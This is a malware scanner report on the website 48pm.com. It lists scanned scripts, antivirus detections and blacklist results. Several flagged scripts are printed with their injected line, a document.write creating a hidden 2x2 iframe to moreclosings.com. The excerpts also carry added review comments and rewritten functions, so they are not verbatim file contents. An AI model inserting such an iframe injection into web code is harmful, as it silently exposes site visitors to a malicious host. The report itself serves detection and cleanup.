
Malware Scanner report for 48pm.com

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/11/11
11 suspicious iframes found. See details below
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://www.48pm.com/
200 OK
Content-Length: 32756
Content-Type: text/html
clean
http://www.48pm.com/js/loadevent.js
200 OK
Content-Length: 396
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

/**
 * Register a callback for the window load event without discarding a
 * handler that is already installed on window.onload.
 *
 * @param {Function} func - Callback to run once the page has loaded.
 */
function addLoadEvent(func) {
  var previous = window.onload;
  if (typeof window.onload == 'function') {
    // A handler already exists: run it first, then the new callback.
    window.onload = function() {
      if (previous) {
        previous();
      }
      func();
    };
    return;
  }
  // Nothing callable is installed yet, so the callback becomes the handler.
  window.onload = func;
}
// NOTE(review): this statement sits outside addLoadEvent and runs as soon as the script is evaluated.
// It writes an iframe with height=2 and width=2 whose src is on a different host than the scanned site;
// the scanner reports it as a hidden iframe. The same statement ends every flagged script excerpted in
// this report, so it was presumably appended to the files rather than written by the site's author.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/styleswitcher.js
200 OK
Content-Length: 8487
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getAllSheets() {
if( !window.ScriptEngine && navigator.__ice_version ) { return document.styleSheets; }
if( document.getElementsByTagName ) { var Lt = document.getElementsByTagName('link'), St = document.getElementsByTagName('style');
} else if( document.styleSheets && document.all ) { var Lt = document.all.tags('LINK'), St = document.all.tags('STYLE');
} else { return []; } for( var x = 0, os = []; Lt[x]; x++ ) {
var rel = Lt[x].rel ? Lt[x].rel
... 3787 bytes are skipped ...
{
$('more_'+i).style.display = '';
$('link_'+i).innerHTML = 'less <img src=\"http://www.originalsignal.com/images/less.gif\" alt=\"fold\" />';
}
}
}
}
/**
 * Switch to the 'big' style when the 'fontsize' cookie holds 'big'.
 * getCookie and changeStyle are not defined in this excerpt.
 */
function setStyle() {
  var savedSize = getCookie('fontsize');
  if (savedSize != 'big') {
    return;
  }
  changeStyle('big');
}
// NOTE(review): top-level statement after the last function of the excerpt; it is unrelated to the
// style-switching code above. It writes a 2x2 iframe pointing at a different host, which the scanner
// reports as a hidden iframe. Presumably appended to the file; the identical statement closes the
// other flagged scripts in this report.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/prototype.js
200 OK
Content-Length: 55314
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/scriptaculous.js
200 OK
Content-Length: 2412
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/default.js
200 OK
Content-Length: 3942
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

/**
 * Write a cookie that expires a given number of days from now.
 *
 * @param {string} cookieName - Name, written verbatim before the '='.
 * @param {*} cookieValue - Value, passed through escape() before it is written.
 * @param {number} nDays - Lifetime in days; null, undefined or 0 falls back to 365.
 */
function setCookie(cookieName,cookieValue,nDays) {
  var lifetimeDays = (nDays==null || nDays==0) ? 365 : nDays;
  var now = new Date();
  var expiry = new Date();
  expiry.setTime(now.getTime() + 3600000*24*lifetimeDays);
  // Only name, value and expires are written: no path, domain, Secure or SameSite attribute.
  var parts = [cookieName + "=" + escape(cookieValue), "expires=" + expiry.toGMTString()];
  document.cookie = parts.join(";");
}
function getCookie(name) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ((!start) && (name != do
... 3483 bytes are skipped ...
(screen.width - 460) / 2;
var wint = (screen.height - 450) / 2;
var thevars = 'resizable=yes,scrollbars=yes,status=0,menubar=no,width=460,height=450,top=' + wint + ',left=' + winl;

newwindow=window.open(url,'popup',thevars);
if (window.focus) {newwindow.focus()}
return false;
}

// NOTE(review): top-level statement following the popup helper; it does not belong to the cookie or
// window code in this file. It writes a 2x2 iframe whose src is on a different host and is reported by
// the scanner as a hidden iframe. Presumably appended to the file; the other flagged scripts in this
// report end with the identical statement.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/lightbox.js
200 OK
Content-Length: 6080
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

// Lower-cased user-agent string of the visiting browser.
var detect = navigator.userAgent.toLowerCase();
// Script-wide state; getBrowserInfo below assigns browser and OS.
var OS,browser,version,total,thestring;
function getBrowserInfo() {
if (checkIt('konqueror')) {
browser = "Konqueror";
OS = "Linux";
}
else if (checkIt('safari')) browser = "Safari"
else if (checkIt('omniweb')) browser = "OmniWeb"
else if (checkIt('opera')) browser = "Opera"
else if (checkIt('webtv')) browser = "WebTV";
else if (checkIt('icab')) browser = "iCab"
else if (checkIt('m
... 4273 bytes are skipped ...
overlay.id = 'overlay';
lb = document.createElement('div');
lb.id = 'lightbox';
lb.className = 'loading';
lb.innerHTML = '<div id="lbLoadMessage">' +
'<p>Loading</p>' +
'</div>';
bod.appendChild(overlay);
bod.appendChild(lb);
}
// NOTE(review): top-level statement after the lightbox setup code and unrelated to it. It writes a
// 2x2 iframe pointing at a different host; the scanner reports it as a hidden iframe and several
// antivirus engines label the file as a JavaScript redirector. Presumably appended to the file; the
// identical statement ends the other flagged scripts in this report.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

AntiVir
JS/Redir.jea
Avast
JS:Redirector-FA [Trj]
Ikarus
Trojan.JS.Redir
nProtect
Trojan.JS.Redirector.ADM
Emsisoft
Trojan.JS.Redirector.ADM (B)
Comodo
TrojWare.JS.Redirect.sst
Microsoft
Trojan:JS/Redirector.EV
TotalDefense
JS/Redirector.BB
F-Secure
Trojan.JS.Redirector.ADM
Sophos
Mal/HappJS-A
GData
Trojan.JS.Redirector.ADM
ESET-NOD32
JS/TrojanDownloader.HackLoad.AE
BitDefender
Trojan.JS.Redirector.ADM

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/boxover2.js
200 OK
Content-Length: 11099
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/menu.js
200 OK
Content-Length: 1145
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

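/**
 * Give a tab its "active" look: background image, height and offsets.
 * Does nothing when no element has the given id.
 *
 * @param {string} tab - id of the tab element.
 */
function makeActive(tab) {
  // Declared locally: the original assigned to an undeclared `el`, which
  // creates a page-wide global and throws in strict mode.
  var el = document.getElementById(tab);
  if (!el) {
    return;
  }

  // The image is fetched over plain http from a host other than the scanned site.
  el.style.backgroundImage = 'url(http://www.originalsignal.com/images/bg_tab6.gif)';
  el.style.height = '21px';
  el.style.marginTop = '-4px';
  el.style.paddingTop = '7px';
}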
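/**
 * Remove the "active" background image from a tab.
 * Does nothing when no element has the given id.
 *
 * @param {string} tab - id of the tab element.
 */
function hideActive(tab) {
  // Declared locally: the original assigned to an undeclared `el`, which
  // creates a page-wide global and throws in strict mode.
  var el = document.getElementById(tab);
  if (!el) {
    return;
  }

  el.style.backgroundImage = '';
}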
function showSub(id,subid) {

el = document.getElementById(subid);
el.style.visi
... 169 bytes are skipped ...
e.height = '21px';
tid.style.marginTop = '-4px';
tid.style.paddingTop = '7px';

}
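/**
 * Hide a sub-menu and clear the background image of its parent tab.
 * Each element is handled independently; a missing one is skipped.
 *
 * @param {string} id - id of the parent tab element.
 * @param {string} subid - id of the sub-menu element.
 */
function hideSub(id,subid) {
  // Both lookups are declared locally: the original assigned to undeclared
  // `el` and `tid`, which creates page-wide globals and throws in strict mode.
  var el = document.getElementById(subid);
  if (el) {
    el.style.visibility = 'hidden';
  }

  var tid = document.getElementById(id);
  if (tid) {
    tid.style.backgroundImage = '';
  }
}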
// NOTE(review): top-level statement after hideSub and unrelated to the menu functions above. It
// writes a 2x2 iframe whose src is on a different host, which the scanner reports as a hidden iframe.
// Presumably appended to the file; the identical statement ends the other flagged scripts in this
// report.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/fader.js
200 OK
Content-Length: 877
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/beansmenu.js
200 OK
Content-Length: 773
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/beanspopbox.js
200 OK
Content-Length: 4210
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19470
Content-Type: text/javascript
clean
http://www.48pm.com/mobile
404 Not Found
Content-Length: 310
Content-Type: text/html
clean
http://www.48pm.com/test404page.js
404 Not Found
Content-Length: 318
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 48pm.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 48pm.com
Referer: http://www.google.com/search?q=48pm.com

Result:
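The result is similar to the first query. No suspicious redirects were found. This check compares only the two requests shown above; it does not cover the hidden iframe reported in the scanned scripts.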

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=48pm.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://48pm.com/

Result: 48pm.com is not infected or malware details are not published yet.